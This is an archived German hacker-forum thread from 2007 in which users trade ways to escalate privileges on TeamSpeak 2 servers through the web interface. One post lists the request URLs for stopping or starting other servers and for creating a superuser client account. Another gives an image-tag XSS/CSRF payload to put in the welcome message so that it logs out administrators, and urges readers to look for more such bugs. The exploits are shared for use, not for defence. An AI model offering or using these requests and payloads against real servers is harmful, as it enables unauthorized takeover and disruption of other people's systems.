PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : SA-Rechte -> get SSA, Root Access?



tobitobi
13.08.2007, 19:56
Hey,
ich hab es hinbekommen mit SA rechten andere Server auf dem root zu stoppen und auch irgendwie, einen zu erstellen. Das finde ich sehr merkwürdig. Dann muss ich doch auch an SSA rechte rankommen bzw. an den Root. Irgendwie jedoch nicht so ganz. Hat jemand mal so pauschal ne Idee?

Falls mehr Infos erforderlich sind, schreib ich sie :)

Thx 4 help

:)

Tobi

tobitobi
13.08.2007, 20:54
So, dann will ich mal...

Also, es klappt wohl bei allen Versionen ^^ weiß nochnet genau

man gibt sich alle SA rechte im Interface.

Dann wie folgt:

einloggen

http://tsip:portvominterface/server_manager_add.html
http://tsip:portvominterface/start_server.tscmd?serverid=id ausprobieren

/stop_server.tscmd?serverid=idausporbben

http://ip:14534/add_sclient.tscmd?clientpw1=nnnn&clientpw2=nnnn&clientloginname=snoob

Reicht so oder mehr?

Freshwood
13.08.2007, 21:09
Lol leute des is doch schon ein alter hut mit dem exploit!!!
Ich glaub des geht gar nicht mit SA, man muss ein regist. user sein mit Zugang zum webinterface... (den du natürlich mit den rechten des SA freischalten musst) so und hier fangt dann der exploit an...
hatte mal nen link werd den demnächst posten lol muss erst suchen ;)

Er0r67O3
14.08.2007, 09:25
http://www.free-hack.com/viewtopic.php?t=28095 :wink:

par0noid
14.08.2007, 13:42
vorallem muss er sich ja auch per Telnet die Server ID holen wenn er sich nen server erstellt...oder en anderen runterfahren will...das hatter nicht erwähnt

Freshwood
14.08.2007, 19:17
So hab jetzt hier den link mit den einen Exploit könnt ihr euch mal reinziehen...
http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/062935.html

Sunfire
14.08.2007, 19:24
Naja ist ja nichts weltbewegendes ist schon sehr alt aber ich weiss nicht ob das überhaupt noch klappt bei den neuen versionen.

Er0r67O3
15.08.2007, 12:44
So hab jetzt hier den link mit den einen Exploit könnt ihr euch mal reinziehen...
http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/062935.html

mit XSS ist noch 10 mal mehr möglich...

im allgemeinen haben die nur die seiten mit SA aufrufen wollen und es hat eben geklappt, mehr nicht...

kleiner tipp:

<img src=logout.tscmd width=0 height=0>
--> das in die willkommensnachricht rein und wenn der SA oder SSA den overview ansieht wird er ausgeloggt...

wenn ihr ein bisschen eure köpfe benutzt findet ihr noch die richtigen XSS bugs raus ;)

Freshwood
15.08.2007, 19:08
lol nicht schlecht...
aber einer der ein bisschen ahnung davon hat... der merkt doch dann, dass da was faul ist...
ausserdem sieht der willkomen text auch nicht grad schön aus...
aber trotzdem schöner bug...

maxlin1990
15.08.2007, 19:16
lol nicht schlecht...
aber einer der ein bisschen ahnung davon hat... der merkt doch dann, dass da was faul ist...
ausserdem sieht der willkomen text auch nicht grad schön aus...
aber trotzdem schöner bug...

Mit Serverversion 2.0.23.22 sind meines Wissens nach XSS Bugs behoben.